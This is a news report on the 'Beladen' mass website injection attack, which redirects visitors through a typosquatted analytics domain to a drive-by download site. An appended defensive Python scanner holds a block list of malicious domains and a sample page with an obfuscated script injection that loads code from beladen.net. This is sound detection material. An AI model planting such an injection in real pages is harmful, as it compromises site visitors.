
“Beladen” website compromises cropping up

A mass injection attack similar, but unrelated, to Gumblar has infected more than 40,000 websites, according to new research from Websense Security Labs.

Thousands of websites are now redirecting unsuspecting users to an exploit site called Beladen, which by means of drive-by download is serving up a trojan downloader to users running older browser versions, and pop-up ads promoting rogue anti-virus for those who are patched, Stephan Chenette, manager of security research at Websense, told SCMagazineUS.com on Monday.

“Beladen in German means ‘loaded,’ which is a suitable name because Beladen is loaded with exploits,” Chenette said.

The Beladen.net domain isn't new – it's been around since last June, Mary Landesman, senior security researcher at ScanSafe, told SCMagazineUS.com on Monday. Chenette said that while Beladen.net has been flagged by the security community as malicious for quite some time, it's only recently that Beladen.net became involved as the final landing page in this massive injection attack. Landesman added that Beladen is an example of a larger trend: the mass compromise of legitimate websites, which was illustrated recently by the huge uptick in Gumblar infections.

Those behind this new attack are sweeping the web looking for vulnerable websites -- and as of Monday have compromised about 40,000, Chenette said. He added that Websense is still analyzing this threat and it's still unclear what the common vulnerability is, but attackers have found a hole in these websites that has enabled them to inject malicious obfuscated, or scrambled, JavaScript code. The vulnerability is most likely present in some type of content management system, forum or blogging software, or some underlying web framework on which the websites are built, Chenette added.

As a result of the malicious code, when a user visits one of these compromised sites they are redirected twice -- first to a website that logs statistical information for the attacker, and then to the Beladen site where the malware is served. These redirections occur within milliseconds of each other, Chenette said.

Once at the Beladen site, if the user is not running the latest version of Firefox or Internet Explorer, their machine would be compromised by the drive-by download, which does not require any user interaction, Chenette said. If the user is running an up-to-date browser, they will be served pop-up ads prompting them to download rogue anti-virus software.

This exploit is similar to Gumblar in that it's an example of a mass-injection attack. However, the exploits being used and the domains involved are different from Gumblar's, leading researchers at Websense to believe the two attacks are unrelated, Chenette said.

ScanSafe's Landesman agreed, noting that Beladen is a smaller-scale attack than Gumblar. During the month of May, Gumblar accounted for 37 percent of all web malware blocks made by ScanSafe, whereas Beladen accounted for only 0.03 percent, Landesman said.

“Like most of these long-living attack domains they will go silent for a while, and will crop back up,” Landesman said.

But Landesman added that the overall problem of mass injection attacks is significant, with close to 1,000 unique attacks every two weeks.

“Beladen is one of 1,000,” she said.

Chenette said that the Russian Business Network (RBN) might be responsible for this attack because the first site that users are redirected to, which logs statistical information for the attacker, was formerly owned by the RBN. It's a typosquatting site that uses a name similar to the legitimate Google Analytics domain (https://www.google-analystics.com), which provides statistics services for websites.
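The two indicators the article describes, an obfuscated inline script injected into a legitimate page and an external script loaded from a typosquatted analytics domain, can be checked for with a small page scanner. The following is an added example written for this page, not code from Websense or ScanSafe; the only domains it takes from the article are beladen.net and www.google-analystics.com, while the legitimate host it compares against (www.google-analytics.com), the similarity threshold, the obfuscation heuristics and the sample HTML are assumptions constructed for illustration.

```python
import re
from difflib import SequenceMatcher
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts named in the article; the legitimate host is an assumption for comparison.
KNOWN_BAD = {"beladen.net", "www.google-analystics.com"}
LEGIT_HOSTS = {"www.google-analytics.com"}

# Heuristic (assumed) markers of scrambled JavaScript: decoding calls or long %xx runs.
OBFUSCATION = re.compile(
    r"\b(unescape|eval|String\.fromCharCode)\s*\(|(%[0-9a-fA-F]{2}){8,}")


class ScriptCollector(HTMLParser):
    """Collects external <script src> URLs and inline <script> bodies."""

    def __init__(self):
        super().__init__()
        self.srcs, self.inline, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)
            else:
                self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline.append(data)


def lookalike(host, legit=LEGIT_HOSTS, threshold=0.9):
    """True if host closely resembles a legitimate host without being one of them."""
    return any(h != host and SequenceMatcher(None, host, h).ratio() >= threshold
               for h in legit)


def scan_html(html):
    """Return (finding, detail) pairs for suspicious scripts in an HTML document."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.srcs:
        host = (urlparse(src).hostname or "").lower()
        if host in KNOWN_BAD:
            findings.append(("known-bad-domain", host))
        elif lookalike(host):
            findings.append(("lookalike-domain", host))
    for body in parser.inline:
        if OBFUSCATION.search(body):
            findings.append(("obfuscated-inline-script", body.strip()[:40]))
    return findings


# Constructed sample page: one typosquatted script include and one scrambled inline script.
SAMPLE = """<html><body><p>Welcome</p>
<script src="http://www.google-analystics.com/urchin.js"></script>
<script>document.write(unescape('%3Cscript%20src%3D%22http%3A//beladen.net/x.js%22%3E'))</script>
</body></html>"""

if __name__ == "__main__":
    for kind, detail in scan_html(SAMPLE):
        print(f"{kind}: {detail}")
```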

“The Beladen mass injection attack is very indicative that the RBN might be back at work, which would be huge news for the security community since we thought at one point that they had disappeared from the malicious scene,” Chenette said.
